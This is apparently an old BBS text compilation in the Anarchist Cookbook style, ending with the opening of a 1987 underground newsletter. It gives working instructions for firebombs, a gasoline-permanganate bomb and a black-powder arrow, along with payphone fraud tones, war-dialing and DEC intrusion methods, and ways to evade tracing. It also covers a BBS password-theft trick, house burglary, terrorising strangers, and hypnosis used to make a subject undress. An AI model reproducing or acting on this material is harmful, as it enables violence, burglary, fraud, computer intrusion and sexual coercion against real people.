D1:USERLOG.DAT

Breaking into Bedwetter's BBS

Again you then d/l this file non-Xmodem and you will see:

Breaking into Bedwetter's BBS

Selection [0]:

You then hit 1 and the long USERLOG.DAT file comes flying at you.
The Sysop is the first entry in this very long file so it is easy. You will
see:

SYSOP'S NAME        X1XXX
You should now have his 2 passwords.

There is only one easy way out of this that I can think of, and that is
to make all new uploads go to SYSOP level (Level 9) access only. This way
nobody can pull off what I just explained.
I feel this is a major Bug on Mr. Ledbetter's part. I just don't know why
no one had thought of it before. I would like to give credit to 
Redline for the message he left on Modem Hell telling about this problem,
and also to Unka for his ideas and input about correcting it.

This has been brought to you from [_The_Piper_] and the S.O.D. BBS
Network!

Firebombs                                       by the Jolly Roger

Most fire bombs are simply gasoline filled bottles with a fuel
soaked rag in the mouth (the bottle's mouth, not yours). The original
Molotov cocktail, and still about the best, was a mixture of one part
gasoline and one part motor oil. The oil helps it to cling to what it
splatters on.
Some use one part roofing tar and one part gasoline. Fire bombs
have been found which were made by pouring melted wax into gasoline.
              
                                  -------------Exodus-------------


Fuse Ignition Bomb                              by The Jolly Roger

A four strand homemade fuse is used for this. It burns like fury.
It is held down and concealed by a strip of bent tin cut from a can.
The exposed end of the fuse is dipped into the flare igniter. To use
this one, you light the fuse and hold the fire bomb until the fuse has
burned out of sight under the tin. Then throw it and when it breaks,
the burning fuse will ignite the contents.

                                   -------------Exodus------------
                                        see later file on these...


Generic Bomb                                    by the Jolly Roger

1) Aquire a glass container
2) Put in a few drops of gasoline
3) Cap the top
4) Now turn the container around to coat the inner surfaces and then
evaporates
5) Add a few drops of potassium permanganate (<-Get this stuff from a
snake bite kit)
6) The bomb is detonated by throwing aganist a solid object.
*AFTER THROWING THIS THING RUN LIKE HELL THIS THING PACKS ABOUT 1/2
STICK OF DYNAMITE*

                            ---------------Exodus

Green Box Plans                                 by the Jolly Roger

Paying the initial rate in order to use a red box (on certain 
fortresses) left a sour taste in many red boxers mouths, thus the 
green box was invented. The green box generates useful tones such as
COIN COLLECT, COIN RETURN, AND RINGBACK. These are the tones that
ACTS or the TSPS operator would send to the CO when appropriate.
Unfortunately, the green box cannot be used at the fortress station but
must be used by the CALLED party.

Here are the tones:
COIN COLLECT     700+1100hz
COIN RETURN      1100+1700hz
RINGBACK         700+1700hz

Before the called party sends any of these tones, an operator realease
signal should be sent to alert the MF detectors at the CO.
This can be done by sending 900hz + 1500hz or a single 2600 wink (90 ms.)
Also do not forget that the initial rate is collected shortly before the
3 minute period is up. Incidentally, once the above MF 
tones for collecting and returning coins reach the CO, they are 
converted into an appropriate DC pulse (-130 volts for return and
+130 for collect). This pulse is then sent down the tip to the 
fortress. This causes the coin relay to either return or collect the coins.
The alledged "T-network" takes advantage of this information.
When a pulse for coin collect (+130 VDC) is sent down the line,
it must be grounded somewhere. This is usually the yellow or black wire.
Thus, if the wires are exposed, these wires can be cut to prevent
the pulse from being grounded. When the three minute initial
period is almost up, make sure that the black and yellow wires are
severed, then hang up, wait about 15 seconds in case of a second
pulse, reconnect the wires, pick up the phone, and if all goes well,
it should be "JACKPOT" time.
                               ---------Exodus----------


Portable Grenade Launcher                       by the Jolly Roger

If you have a bow, this one is for you. Remove the ferrule from an
aluminum arrow, and fill the arrow with black powder (I use grade
FFFF, it burns easy)and then glue a shotshell primer into the hole
left where the ferrule went. Next, glue a BB on the primer, and you
are ready to go! Make sure no one is nearby.... Little shreds of
aluminum go all over the place!!
                                    ------------Exodus----------



Hacking Tutorial                       Courtesy of the Jolly Roger

What is hacking?
----------------
According to popular belief the term hacker and hacking was founded at mit
it comes from the root of a hack writer,someone who keeps "hacking" at
the typewriter until he finishes the story.a computer hacker would be
hacking at the keyboard or password works.

What you need:
--------------
To hack you need a computer equipped with a modem (a device that lets you
transmit data over phone lines) which should cost you from $100 to $1200.

How do you hack?
----------------
Hacking recuires two things:
1. The phone number
2. Answer to identity elements

How do you find the phone #?
----------------------------
There are three basic ways to find a computers phone number.
1. Scanning,
2. Directory
3. Inside info.

What is scanning?
-----------------
Scanning is the process of having a computer search for a carrier tone.
For example,the computer would start at (800) 111-1111 and wait for carrier
if there is none it will go on to 111-1112 etc.if there is a carrier it
will record it for future use and continue looking for more.

What is directory assictance?
-----------------------------
This way can only be used if you know where your target computer is. For this
example say it is in menlo park, CA and the company name is sri.

1. Dial 411 (or 415-555-1212)
2. Say "Menlo park"
3. Say "Sri"
4. Write down number
5. Ask if there are any more numbers
6. If so write them down.
7. Hang up on operator
8. Dial all numbers you were given
9. Listen fir carrier tone
10. If you hear carrier tone write down number, call it on your modem and your
    set to hack!
                            ---------------EXODUS


The Basics of Hacking II               Courtesy of the Jolly Roger

Basics to know before doing anything, essential to your continuing
career as one of the elite in the country...  This article, "the
introduction to the world of hacking" is meant to help you by telling you
how not to get caught, what not to do on a computer system, what type of
equipment should I know about now, and just a little on the history, past
present future, of the hacker.

Welcome to the world of hacking! We, the people who live outside of the
normal rules, and have been scorned and even arrested by those from the
'civilized world', are becomming scarcer every day.  This is due to the
greater fear of what a good hacker (skill wise, no moral judgements
here)|can do nowadays, thus causing anti- hacker sentiment in the masses.
Also, few hackers seem to actually know about the computer systems they
hack, or what equipment they will run into on the front end, or what they
could do wrong on a system to alert the 'higher' authorities who monitor
the system. This article is intended to tell you about some things not to
do, even before you get on the system.  I will tell you about the new wave
of front end security devices that are beginning to be used on computers.
I will attempt to instill in you a second identity, to be brought up at
time of great need, to pull you out of trouble. And, by the way, I take no, repeat,
no, responcibility for what we say in this and the forthcoming articles.
Enough of the bullshit, on to the fun: after logging on your favorite bbs,
you see on the high access board a phone number!  It says it's a great
system to "fuck around with!" This may be true, but how many other people
are going to call the same number?  So:  try to avoid calling a number
given to the public. This is because there are at least every other
user calling, and how many other boards will that number spread to?
If you call a number far, far away, and you plan on going thru an
extender or a re-seller, don't keep calling the same access number
(I.E. As you would if you had a hacker running), this looks very suspicious
and can make life miserable when the phone bill comes in the mail.
Most cities have a variety of access numbers and services,
so use as many as you can. Never trust a change in the system...
The 414's, the assholes, were caught for this reason: when one of them
connected to the system, there was nothing good there.  The next time,
there was a trek game stuck right in their way!  They proceded to play said
game for two, say two and a half hours, while telenet was tracing them!
Nice job, don't you think?  If anything looks suspicious, drop the line
immediately!!  As in, yesterday!! The point we're trying to get accross is:
if you use a little common sence, you won't get busted.  Let the little
kids who aren't smart enough to recognize a trap get busted, it will take
the heat off of the real hackers. Now, let's say you get on a computer
system...  It looks great, checks out, everything seems fine.
Ok, now is when it gets more dangerous.  You have to know the computer
system to know what not to do. 
Basically, keep away from any command something, copy a new file into the
account, or whatever!  Always leave the account in the same status you
logged in with.  Change *nothing*... If it isn't an account with priv's,
then don't try any commands that require them! All, yes all, systems are
going to be keeping log files of what users are doing, and that will
show up.  It is just like dropping a trouble-card in an ESS system,
after sending that nice operator a pretty tone.
Spend no excessive amounts of time on the account in one stretch.
Keep your calling to the very late night ifpossible, or during
business hours (believe it or not!).  It so happens
that there are more users on during business hours, and it is very
difficult to read a log file with 60 users doing many commnds every minute.
Try to avoid systems where everyone knows each other, don't try to bluff.
And above all:  never act like you own the system, or are the best there
is. They always grab the people who's heads swell... There is some very
interesting front end equipment around nowadays, but first let's
define terms... By front end, we mean any device that you must
pass thru to get at the real computer. There are devices that are made to
defeat hacker programs, and just plain old multiplexers.
To defeat hacker programs, there are now devices that pick up the phone
and just sit there...  This means that your device gets no carrier,
thus you think there isn't a computer on the other end.  The
only way around it is to detect when it was picked up.  If it pickes up
after the same number ring, then you know it is a hacker-defeater.
These devices take a multi-digit code to let you into the system.
Some are, in fact, quite sophisticated to the point where it
will also limit the user name's down, so only one name or set of names
can be valid logins after they input the code... Other devices input a
number code, and then they dial back a pre-programmed number for that code.
These systems are best to leave alone,
because they know someone is playing with their phone.  You may think "but
i'll just reprogram the dial-back." Think again, how stupid that is...
Then they have your number, or a test loop if you were just a little
smarter. If it's your number, they have your balls (if male...),
If its a loop, then you are screwed again, since those loops
are *monitored*. As for multiplexers...  What a plexer is supposed
to do is this:
The system can accept multiple users. We have to time share, so we'll let
the front-end processor do it...  Well, this is what a multiplexer does.
Usually they will ask for something like "enter class" or "line:".  Usually
it is programmed for a double digit number, or a four to five letter word.
There are usually a few sets of numbers it accepts, but those numbers also
set your 300/1200/2400 baud data type.
These multiplexers are inconvenient at best, so not to worry. A little
about the history of hacking: hacking, by my definition, means a great
knowledge of some special area. Doctors and lawyers
are hackers of a sort, by this definition.  But most often, it is
being used in the computer context, and thus we have a definition of
"anyone who has a great amount of computer or telecommunications
knowledge."  You are not a hacker because you have a list of codes...
Hacking, by my definition, has then been around only about 15 years.
It started, where else but, mit and colleges where they had computer
science or electrical engineering departments.
Hackers have created some of the best computer languages, the
most awesome operating systems, and even gone on to make millions.
Hacking used to have a good name, when we could honestly say
"we know what we are doing".  Now it means (in the public eye):
the 414's, ron austin, the nasa hackers, the arpanet hackers...
All the people who have been caught,
have done damage, and are now going to have to face fines and sentences.
Thus we come past the moralistic crap, and to our purpose:  educate the
hacker community, return to the days when people actually knew something...

                                  --------------Exodus--------------



Hacking DEC's                                 by the Jolly Roger

In this article you will learn how to log in to dec's, logging out, and all
the fun stuff to do in-between.  All of this information is based on a
standard dec system.
Since there are dec systems 10 and 20, and I favor, the dec 20,
there will be more info on them in this article.  It just so happens
that the dec 20 is also the more common of the two, and is used by much
more interesting people (if you know what I mean...) Ok, the first thing
you want to do when you are receiving carrier from a dec system is to find
out the format of login names.  You can do this by looking at who is on the
system.
Dec=> `  (the 'exec' level prompt)
you=> sy
sy is short for sy(stat) and shows you the system status.
You should see the format of login names...
A systat usually comes up in this form:
job  line  program  user
job:  the job number (not important unless you want to log them off later)
line:  what line they are on (used to talk to them...)
These are both two or three digit numbers.
Program:  what program are they running under?  If it says 'exec'
they aren't doing anything at all...
User:  ahhhahhhh!  This is the user name they are logged in under...
Copy the format, and hack yourself outa working code... Login format is as
such:
dec=> `
you=> login username password
username is the username in the format you saw above in the systat.
After you hit the space after your username, it will stop echoing
characters back to your screen.  This is the password you are typing in...
Remember, people  usually use their name, their dog's name, the name of a
favorite character in a book, or something like this. A few clever
people have it set to a key cluster (qwerty or asdfg).  Pw's can be from 1
to 8 characters long, anything after that is ignored. You are finally in...
It would be nice to have a little help, wouldn't it?  Just type a ? Or the
word help, and it will give you a whole list of topics...
Some handy characters for you to know would be the control keys,
wouldn't it? Backspace on a dec 20 is rub which is 255 on your ascii chart.
On the dec 10 it is cntrl-h. To abort a long listing or a program,
cntrl-c works fine.  Use cntrl-o to stop long output to the terminal.
This is handy when playing a game, but you don't want to cntrl-c out.
Cntrl-t for the time. Cntrl-u will kill the whole line you are typing at
the moment.  You may accidently run a program where the only way out is
a cntrl-x, so keep that in reserve. Cntrl-s to stop listing, cntrl-q to
continue on both systems. Is your terminal having trouble??
Like, it pauses for no reason, or it doesn't backspace right?  This is
because both systems support many terminals, and you haven't told it what
yours is yet... You are using a vt05
so you need to tell it you are one.
Dec=> `
you=> information terminal
or...
You=> info
this shows you what your terminal is set up as...
Dec=>all sorts of shit, then the `
you=> set ter vt05 this sets your terminal
type to vt05.
Now let's see what is in the account (here after abbreviated acct.)
that you have hacked onto... Say
=> dir
short for directory, it shows
you what the user of the code has save to the disk.  There should be a format
like this:    xxxxx.Oooxxxxx is the file name, from 1 to 20 characters
long.  Ooo is the file type, one of: exe, txt, dat, bas, cmd   and a few
others that are system dependant.
Exe is a compiled program that can be run (just by typing its name at the `).
Txt is a text file, which you can see by
typing=>
type xxxxx.Txt
Do not try to=>
type xxxxx.Exe this is very bad for your terminal and will tell you
absolutly nothing.
Dat is data they have saved.
Bas is a basic program, you can have it typed out for you.
Cmd is a command type file, a little too
complicated to go into here.
Try =>
take xxxxx.Cmd
By the way, there are other users out there who may have files you can use
(gee, why else am I here?).
Type => dir <*.*> (Dec 20)
     => dir [*,*]   (dec 10)
* is a wildcard, and will allow you to access the files on other accounts
if the user has it set for public access. If it isn't set for public access,
then you won't see it. To run that program:
dec=> `
you=> username program-name
username is the directory you saw the
file listed under, and file name was
what else but the file name?
**  You are not alone  **
remember, you said (at the very start) sy  short for systat,
and how we said this showed the other users on the system?  Well, you
can talk to them, or at least send a message to anyone you see listed in a
systat.  You can do this by:
dec=> the user list (from your systat)
you=> talkusername (dec 20)
      send username (dec 10)
talk allows you and them immediate transmission of whatever you/they type
to be sent to the other.  Send only allow you one message to be sent, and
send, they will send back to you, with talk you can just keep going. By the
way, you may be noticing with the talk command that what you type is still
acted upon by the parser (control program).  To avoid the constant error
messages type either:
you=>  ;your message
you=>  rem your message
the semi-colon tells the parser that what follows is just a comment.  Rem
is short for 'remark' and ignores you from then on until you type a cntrl-z
or cntrl-c, at which point it puts you back in the exec mode. To break the
connection from a talk command type:
you=>  break priv's:
if you happen to have privs, you can do all sorts of things. 
First of all, you have to activate those privs.
You=> enable
this gives you a $ prompt, and allows you to do this:
whatever you can do to your own directory you can now do to any
other directory. To create a new acct. Using your privs, just type
=>build username
if username is old, you can edit it, if it is new, you can
define it to be whatever you wish. Privacy means nothing to a user with
privs.  By the way, there are various levels of privs:  operator, wheel,
cia.
wheel is the most powerful, being that he can log in from anywhere and
have his powers.
Operators have their power because they are at a special terminal
allowing them the privs.  Cia is short for 'confidential information
access', which allows you a low level amount of privs. 
Not to worry though, since you can read the system log file, which also
has the passwords to all the other accounts.
To de-activate your privs, type
you=> disable
when you have played your greedy heart out, you can finally leave the
system with the command=>
logout
this logs the job you are using off the system (there may be varients
of this such as kjob, or killjob).

                                ----------------Exodus---------------


Harmless Bombs                                  by the Jolly Roger

To all those who do not wish to inflict bodily damage on their victims
but only terror.
These are weapons that should be used from high places.
1) The flour bomb.
Take a wet paper towel and pour a given amount of baking flour in
the center. Then wrap it up and put on a rubber band to keep it
together. When thrown it will fly well but when it hits, it covers
the victim with the flower or causes a big puff of flour which will
put the victim in terror since as far as they are concerned, some
strange white powder is all over them. This is a cheap method of
terror and for only the cost of a roll of paper towels and a bag of
flour you and your friends can have loads of fun watching people
flee in panic.
2) Smoke bomb projectile.
All you need is a bunch of those little round smoke bombs and a
wrist rocket or any sling-shot. Shoot the smoke bombs and watch the
terror since they think it will blow up!
3) Rotten eggs (good ones)
Take some eggs and get a sharp needle
and poke a small hole in the top of each one.
Then let them sit in a warm place for about a week. Then you've got a
bunch of rotten eggs that will only smell when they hit.
4) Glow in the dark terror.
Take one of those tubes of glow in the dark stuff and pour the
stuff on whatever you want to throw and when it gets on the victim,
they think it's some deadly chemical or a radioactive substance so
they run in total panic. This works especially well with flower
bombs since a gummy, glowing substance gets all over the victim.
5) Fizzling panic.
Take a baggie of a water-baking soda solution and seal it. (Make
sure there is no air in it since the solution will form a gas and
you don't want it to pop on you.) Then put it in a bigger plastic
bag and fill it with vinegar and seal it. When thrown, the two
substances will mix and cause a violently bubbling substance to go
all over the victim.
Updated-'94
                             ---------------Exodus-----------------



Breaking Into Houses                            by the Jolly Roger

Okay You Need:
1.  Tear Gas or Mace
2.  A BB/Pelet Gun
3.  An Ice Pick
4.  Thick Gloves

What You Do Is:

1.  Call the ###-#### of the house, or ring doorbell,  To find out if
    they're home.
2.  If they're not home then...
3.  Jump over the fence or walk through gate (whatever).
4.  If you see a dog give him the mace or tear gas.
5.  Put the gloves on!!!!!!!
6.  Shoot the BB gun slightly above the window locks.
7.  Push the ice-pick through the hole (made by the BB gun).
8.  Enter window.
9.  FIRST...Find the LIVING ROOM. (they're neat things there!).
10.  Then goto the Bed-room to get a pillow  case.  Put the goodies in
     the pillow case.
11.  Get out <-* FAST! -*>

Notes:   You should have certian targets worked out (like computers,
Radios, Ect.,Ect.).    Also <-* NEVER *-> Steal from your own
neigborhood. If you think they have an alarm...<-* FORGET IT! *->.

                  See later file...   Exodus



A Guide to Hypnotism                     Courtesy of the Jolly Roger
      (Originally an Apple ][ file, forgive the uppercase!)

+-------------------+
! WHAT HYPNOTISM IS !
+-------------------+

HYPNOTISM, CONTRARY TO COMMON BELEIF, IS MERELY STATE WHEN YOUR MIND AND
BODY ARE IN A STATE OF RELAXATION AND YOUR MIND IS OPEN TO POSITIVE, OR
CLEVERLY WORDED NEGATIVE, INFLUENCES.  IT IS NOT A TRANCE WHERE YOU:
                  > ARE TOTALLY INFLUENCABLE.
                  > CANNOT LIE.
                  > A SLEEP WHICH YOU CANNOT WAKE UP FROM
                    WITHOUT HELP.
THIS MAY BRING DOWN YOUR HOPE SOMEWHAT, BUT, HYPNOTISM IS A POWERFUL FOR
SELF HELP, AND/OR MISCHEIF.

+-----------------------+
! YOUR SUBCONCIOUS MIND !
+-----------------------+

BEFORE GOING IN FURTHER, I'D LIKE TO STATE THAT HYPNOTISM NOT ONLY IS
GREAT IN THE WAY THAT IT RELAXES YOU AND GETS YOU (IN THE LONG RUN) WHAT
YOU WANT, BUT ALSO THAT IT TAPS A FORCE OF INCREDIBLE POWER, BELEIVE IT OR
NOT, THIS POWER IS YOUR SUBCONCIOUS MIND.
THE SUBCONCIOUS MIND ALWAYS KNOWS WHAT IS GOING ON WITH EVERY PART OF YOUR BODY,
EVERY MOMENT OF THE DAY.  IT PROTECTS YOU FROM NEGATIVE INFLUENCES,
AND RETAINS THE POWER TO SLOW YOUR HEARTBEAT DOWN AND STUFF LIKE THAT.
THE SUBCONCIOUS MIND HOLDS JUST ABOUT ALL THE INFO YOU WOULD LIKE TO KNOW
ABOUT YOURSELF, OR, IN THIS CASE, THE PERSON YOU WILL BE HYPNOTISING.
THERE ARE MANY WAYS TO TALK TO YOUR SUBCONCIOUS AND HAVE IT TALK BACK TO
YOU. ONE WAY IS THE OUJA BOARD, NO ITS NOT A SPIRIT, MERELY THE
MINDS OF THOSE WHO ARE USING IT.  ANOTHER, WHICH I WILL DISCUSS HERE,
IS THE PENDULUM METHOD.  OK, HERE IS HOW IT GOES.
FIRST, GET A RING OR A WASHER AND TIE IT TO A THREAD A LITTLE LONGER THAN
HALF OF YOUR FOREARM.  NOW, TAKE A SHEET OF PAPER AND DRAW A BIG CIRCLE IN
IT.  IN THE BIG CIRCLE YOU MUST NOW DRAW A CROSSHAIR (A BIG +).  NOW, PUT
THE SHEET OF PAPER ON A TABLE.  NEXT, HOLD THE THREAD WITH THE RING OR
WASHER ON IT AND PLACE IT (HOLDING THE THREAD SO THAT THE RING IS 1 INCH
ABOVE THE PAPER SWINGING) IN THE MIDDLE OF THE CROSSHAIR.  NOW, SWING
THE THREAD SO THE WASHER GOES UP AND DOWN, SAY TO YOURSELF THE WORD "YES"
NOW, DO IT SIDE TO SIDE AND SAY THE WORD "NO".
DO IT COUNTER CLOCKWISE AND SAY "I DON'T KNOW".
AND LASTLY, DO IT CLOCKWISE AND SAY "I DONT WANT TO SAY." NOW, WITH THE
THREAD BACK IN THE MIDDLE OF THE CROSSHAIR, ASK YOURSELF QUESTIONS AND
WAIT FOR THE PENDULUM TO SWING IN THE DIRECTION FOR THE ANSWER. (YES, NO,
I DONT KNOW OR I DONT WANNA SAY...). SOON, TO YOUR AMAZEMENT, IT WILL BE
ANSWERING QUESTIONS LIKE ANYTHING... LET THE PENDULUM ANSWER, DONT TRY..
WHEN YOU TRY YOU WILL NEVER GET AN ANSWER.  LET THE ANSWER COME TO YOU.

+-------------------------+
! HOW TO INDUCE HYPNOTISM !
+-------------------------+

NOW THAT YOU KNOW HOW TO TALK TO YOUR SUBCONCIOUS MIND, I WILL NOW TELL YOU
HOW TO GUIDE SOMEONE INTO HYPNOSIS. NOTE THAT I SAID GUIDE, YOU CAN NEVER,
HYNOTISE SOMEONE, THEY MUST BE WILLING. OK, THE SUBJECT MUST BE LYING OR
SITTING IN A COMFORTABLE POSITION, RELAXED, AND AT A TIME WHEN THINGS ARENT
GOING TO BE INTERRUPTED.
TELL THEM THE FOLLOWING OR SOMETHING CLOSE TO IT, IN A PEACEFUL, MONOTINOUS
TONE (NOT A COMMANDING TONE OF VOICE)

NOTE:  LIGHT A CANDLE AND PLACE IT SOMEWHERE WHERE IT CAN BE EASILY SEEN.

TAKE A DEEP BREATH THROUGH YOUR NOSE AND HOLD IT IN FOR A COUNT OF 8. NOW,
THROUGH YOUR MOUTH, EXHALE COMPLETELY AND SLOWLY. CONTINUED BREATHING LONG,
DEEP, BREATHS THROUGH YOUR NOSE AND EXHALING THROUGH YOUR MOUTH.  TENSE UP
ALL YOUR MUSCLES VERY TIGHT, NOW, COUNTING FROM TEN TO ONE, RELEASE THEM
SLOWLY, YOU WILL FIND THEM VERY RELAXED.  NOW, LOOK AT THE CANDLE, AS
YOU LOOK AT IT, WITH EVERY BREATH AND PASSING MOMEMENT, YOU ARE FEELING
INCREASINGLY MORE AND MORE PEACEFUL AND RELAXED.  THE CANDLES FLAME IS
PEACEFUL AND BRIGHT.
AS YOU LOOK AT IT I WILL COUNT FROM 100 DOWN, AS A COUNT, YOUR EYES WILL
BECOME MORE AND MORE RELAXED, GETTING MORE AND MORE TIRED WITH EACH
PASSING MOMENT."
NOW, COUNT DOWN FROM 100, ABOUT EVERY 10 NUMBERS SAY "WHEN I REACH XX YOUR
EYES (OR YOU WILL FIND YOUR EYES) ARE BECOMING MORE AND MORE TIRED."  TELL
THEM THEY MAY CLOSE THEIR EYES WHENEVER THEY FEEL LIKE IT.  IF THE PERSONS
EYES ARE STILL OPEN WHEN YOU GET TO 50 THEN INSTEAD OF SAYING
"YOUR EYES WILL.."
SAY "YOUR EYES ARE...".
WHEN THEIR EYES ARE SHUT SAY THE FOLLOWING. AS YOU LIE (OR SIT) HERE WITH
YOUR EYES COMFORTABLY CLOSE YOU FIND YOURSELF RELAXING MORE AND
MORE WITH EACH MOMENT AND BREATH.
THE RELAXATION FEELS PLEASANT AND BLISSFUL SO, YOU HAPPILY GIVE WAY TO
THIS WONDERFUL FEELING. IMAGINGE YOURSELF ON A CLOUD, RESTING PEACEFULLY,
WITH A SLIGHT BREEZE CARESSING YOUR BODY.  A TINGLING SENSASION BEGINS
TO WORK ITS WAY, WITHIN AND WITHOUT YOUR TOES, IT SLOWLY MOVES UP YOUR
FEET, MAKING THEM WARM, HEAVY AND RELAXED. THE CLOUD IS SOFT AND SUPPORTS
YOUR BODY WITH ITS SOFT TEXTURE, THE SCENE IS PEACEFUL AND ABSORBING,
THE PEACEFULNESS ABSORBS YOU COMPLETELY... 
THE TINGLING GENTLY AND SLOWLY MOVES UP YOUR LEGS, RELAXING THEM.
MAKING THEM WARM AND HEAVY.  THE RELAXATION FEELS VERY GOOD, IT FEELS SO
GOOD TO RELAX AND LET GO. AS THE TINGLING CONTINUES ITS JOURNEY UP INTO
YOUR SOLAR PLEXUS, YOU FEEL YOUR INNER STOMACH BECOME VERY RELAXED.  NOW,
IT MOVES SLOWLY INTO YOUR CHEST, MAKING YOUR BREATHING RELAXED AS WELL.
THE FEELING BEGINS TO MOVE UP YOUR ARMS TO YOUR SHOULDERS, MAKING YOUR ARMS
HEAVY AND RELAXED AS WELL.  YOU ARE AWARE OF THE TOTAL RELAXATION YOU ARE
NOW EXPERIENCING, AND YOU GIVE WAY TO IT.  IT IS GOOD AND PEACEFUL, THE
TINGLING NOW MOVEVES INTO YOUR FACE AND HEAD, RELAXING YOUR JAWS, NECK, AND
FACIAL MUSCLES, MAKING YOUR CARES AND WORRIES FLOAT AWAY. AWAY INTO THE
BLUE SKY AS YOU REST BLISFUlLY ON THE CLOUD....
IF THEY ARE NOT RESPONSIVE OR YOU THINK THEY (HE OR SHE..) IS GOING TO
SLEEP, THEN ADD IN A "...ALWAYS CONCENTRATING UPON MY VOICE, INGORING ALL
OTHER SOUNDS.  EVEN THOUGH OTHER SOUNDS EXSIST, THEY AID YOU IN YOUR
RELAXATION..." THEY SHOULD SOON LET OUT A SIGH AS IF THEY WERE LETTING GO,
AND THEIR FACE SHOULD HAVE A "WOODENESS" TO IT, BECOMING FEATURLESS... NOW,
SAY THE FOLLOWING "....  YOU NOW FIND YOURSELF IN A HALLWAY, THE HALLWAY IS
PEACEFUL AND NICE. AS I COUNT FROM 10 TO 1 YOU WILL IMAGINE YOURSELF
WALKING FURTHER AND FURTHER DOWN THE HALL. WHEN I REACH ONE YOU WILL FIND
YOURSELF WHERE YOU WANT TO BE, IN ANOTHER, HIGHER STATE OF CONCIOUS AND
MIND. (COUNT FROM TEN TO ONE)....." DO THIS ABOUT THREE OR FOUR TIMES.
THEN, TO TEST IF THE SUBJECT IS UNDER HYPNOSIS OR NOT, SAY....
"...YOU FEEL A STRANGE SENSATION IN YOUR (ARM THEY WRITE WITH) ARM, THE
FEELING BEGINS AT YOUR FINGERS AND SLOWLY MOVES UP YOUR ARM, AS IT MOVES
THROUGH YOUR ARM YOUR ARM BECOMES LIGHTER AND LIGHTER, IT WILL SOON BE SO
LIGHT IT WILL .....  BECOMING LIGHTER AND LIGHTER WHICH EACH BREATH AND
MOMENT..."
THEIR FINGERS SHOULD BEGIN TO TWITCH AND THEN MOVE UP, THE ARM FOLLOWING,
NOW MY FRIEND, YOU HAVE HIM/HEP IN HYPNOSIS.  THE FIRST TIME YOU DO THIS,
WHILE HE/SHE IS UNDER SAY GOOD THINGS, LIKE:  "YOUR GOING TO FEEL GREAT
TOMORROW" OR "EVERY DAY IN EVERY WAY YOU WILL FIND YOURSELF BECOMING BETTER
AND BETTER".. OR SOME CRAP LIKE THAT... THE MORE THEY GO UNDER, THE DEEPER
IN HYPNOSIS THEY WILL GET EACH TIME YOU DO IT.

+----------------------------+
! WHAT TO DO WHEN HYPNOTISED !
+----------------------------+

WHEN YOU HAVE THEM UNDER YOU MUST WORD THINGS VERY CAREFULLY TO GET YOUR
WAY. YOU CANNOT SIMPLY SAY...  TAKE OFF YOUR CLOTHES AND FUCK THE PILLOW.
NO, THAT WOULD NOT REALLY DO THE TRICK. YOU MUST SAY SOMETHING LIKE....
"YOU FIND YOUR SELF AT HOME, IN YOUR ROOM AND YOU HAVE TO TAKE A SHOWER
(VIVIDLY DESCRIBE THEIR ROOM AND WHATS HAPPENING), YOU BEGIN TO TAKE OFF
YOUR CLOTHES..."  NOW, IT CANT BE THAT SIMPLE, YOU MUST KNOW THE PERSONS
HOUSE, ROOM, AND SHOWER ROOM. THEN DESCRIBE THINGS VIVIDLY AND TELL THEM
TO ACT IT OUT (THEY HAVE TO BE DEEPLY UNDER TO DO THIS...).  I WOULD JUST
SUGGEST THAT YOU EXPERIMENT A WHILE, AND GET TO KNOW HO; TO DO THINGS.

+-----------+
! WAKING UP !
+-----------+

WAKING UP IS VERY EASY, JUST SAY.. "...AS I COUNT FROM 1 TO 5 YOU WILL
FIND YOURSELF BECOMMING MORE AND MORE AWAKE, MORE AND MORE LIVELY.  WHEN
YOU WAKE UP YOU WILL FIND YOURSELF COMPLETELY ALIVE, AWAKE, AND REFRESHED.
MENTALLY AND PHYSICALLY, REMEMBERING THE PLEASANT SENSATION THAT HYPNOSIS
BRINGS...  WAKING UP FEELING LIKE A NEW BORN BABY, REBORN WITH LIFE AND
VIGOR, FEELING EXCELLENT. REMEMBERING THAT NEXT TIME YOU ENTER HYPNOSIS IT
WILL BECOME AN EVER INCREASING DEEPER AND DEEPER STATE THAN BEFORE.
1- YOU FEEL ENERGY COURSE THROUGHOUT YOUR LIMBS.
2- YOU BEGIN TO BREATHE DEEPLY, STIRRING.
3- BEGINING TO MOVE MORE AND MORE YOUR EYES OPEN, BRINGING YOU UP TO
FULL CONCIOUS.
4- YOU ARE UP,UP, UP AND AWAKENING MORE AND MORE.
5- YOU ARE AWAKE AND FEELING GREAT."

AND THATS IT!  YOU NOW KNOW HOW TO HYPNOTISE YOURSELF AND SOMEONE ELSE.
YOU WILL LEARN MORE AND MORE AS YOU EXPERIMENT.

                            ------------------Jolly Roger


##########################################################################
#                                                                        #
#                           The Remote Informer                          #
#                                                                        #
#------------------------------------------------------------------------#
#             Reader supported newsletter for the underworld             #
#------------------------------------------------------------------------#
#                                                                        #
#                    Editors: Tracker and Norman Bates                   #
#                                                                        #
#========================================================================#
# September 1987                                               Issue: 01 #
#========================================================================#
#                              The Headlines                             #
#------------------------------------------------------------------------#
#                     1) Introduction                                    #
#                     2) Hacking Sprint: The Easy Way                    #
#                     3) Rumors: Why spread them?                        #
#                     4) The New Sprint FON Calling Cards                #
#                     5) Automatic Number Identifier (ANI)               #
##########################################################################
           
                   Introduction
--------------------------------------------------------------------------
Welcome to the first issue of 'The Remote Informer'!  This newsletter
is reader supported.  If the readers of this newsletter do not help
support it, then it will end.  We are putting this out to help out the
ones that would like to read it.  If you are one of those who thinks they
know everything, then don't bother reading it.  This newsletter is not
anything like the future issues.  The future issues will contain several
sections, as long as reader input is obtained.  Below is an outline
overview of the sections in the future issues.

I/O Board (Input/Output Board)

The I/O Board is for questions you have, that we might be able to
answer or atleast refer you to someone or something.  We will be honest if
we cannot help you.  We will not make up something, or to the effect, just
to make it look like we answered you.  There will be a section in the I/O
Board for questions we cannot answer, and then the readers will have the
opportunity to answer it.  We will print anything that is reasonable in
the newsletter, even complaints if you feel like you are better than
everyone.

NewsCenter

This section will be for news around the underworld.  It will talk of
busts of people in the underworld and anything else that would be
considered news.  If you find articles in the paper, or something happens
in your local area, type it up, and upload it to one of the boards listed
at the end of the newsletter.  Your handle will be placed in the article.
If you do enter a news article, please state the date and from where you
got it.

Feature Section

The Feature Section will be the largest of the sections as it will be
on the topic that is featured in that issue.  This will be largely reader
input which will be sent in between issues.  At the end of the issue at
hand, it will tell the topic of the next issue, therefore, if you have
something to contribute, then you will have ample time to prepare your
article.

Hardware/Software Review
In this section, we will review the good and bad points of hardware
and software related to the underworld.  It will be an extensive review,
rather than just a small paragraph.

The Tops

This section will be the area where the top underworld BBS's, hacking
programs, modem scanners, etc. will be shown.  This will be reader
selected and will not be altered in anyway.  The topics are listed below.
